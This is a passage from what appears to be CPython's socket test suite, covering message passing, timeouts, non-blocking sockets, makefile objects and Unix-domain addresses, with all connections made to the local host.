SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid cloding the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# plaform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
